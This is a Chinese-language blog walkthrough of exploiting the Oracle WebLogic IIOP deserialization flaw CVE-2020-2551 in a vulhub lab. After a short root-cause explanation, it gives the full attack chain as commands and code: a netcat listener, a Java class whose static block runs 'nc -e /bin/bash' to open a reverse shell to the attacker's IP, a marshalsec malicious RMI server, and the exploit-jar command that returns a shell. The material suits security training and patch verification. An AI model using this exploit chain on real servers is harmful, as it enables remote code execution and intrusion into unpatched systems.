CVE-2020-2551

前言

2020年1月15日,Oracle发布了一系列的安全补丁,其中Oracle WebLogic Server产品有高危漏洞,漏洞编号CVE-2020-2551,CVSS评分9.8分,漏洞利用难度低,可基于IIOP协议执行远程代码。

经过分析这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。

环境搭建

直接使用vulhub中的CVE-2017-10271就可以

使用git克隆到本地

git clone https://github.com/vulhub/vulhub.git

图片

进入对应环境

cd vulhub/weblogic/CVE-2017-10271

image-20230107154925407

启动docker漏洞环境

sudo docker-compose up -d

image-20230107155739460

搭建完成以后,访问7001/console如下图所示即为搭建成功

image-20230107160549138

 

检测是否存在漏洞

python3 CVE-2020-2551.py -u http://192.168.52.128:7001/

image-20230107164740702

发现存在漏洞

漏洞利用

攻击机ip:192.168.0.101

靶机ip:192.168.52.128

 

攻击机开启监听nc -lvnp 3333

image-20230107180523151

编写一个exp.java文件:

import java.io.IOException;
public class exp {
       static{
               try {
                       java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","nc -e /bin/bash 192.168.0.101 3333"});
              } catch (IOException e) {
                       e.printStackTrace();
              }
      }
       public static void main(String[] args) {

      }
}

其中"nc -e /bin/bash 192.168.52.130 3333"是要执行的命令

然后进行编译,生成出一个exp.class文件

image-20230107171912137

image-20230107171939453

启一个web服务,需要与exp.class在同一文件夹

image-20230107172232631

使用marshalsec起一个恶意的RMI服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.101/#exp" 1099

image-20230107180020082

然后开始进行攻击,使用命令,成功弹出shell:

java -jar weblogic_CVE_2020_2551.jar 192.168.52.128 7001 rmi://192.168.0.101:1099/exp

image-20230107180754385

下载工具获取私信 微信公众号:助安社区

image-20230107180849525

 

 

 

 

 

posted on 2023-01-11 16:47  助安社区  阅读(188)  评论(0编辑  收藏  举报

导航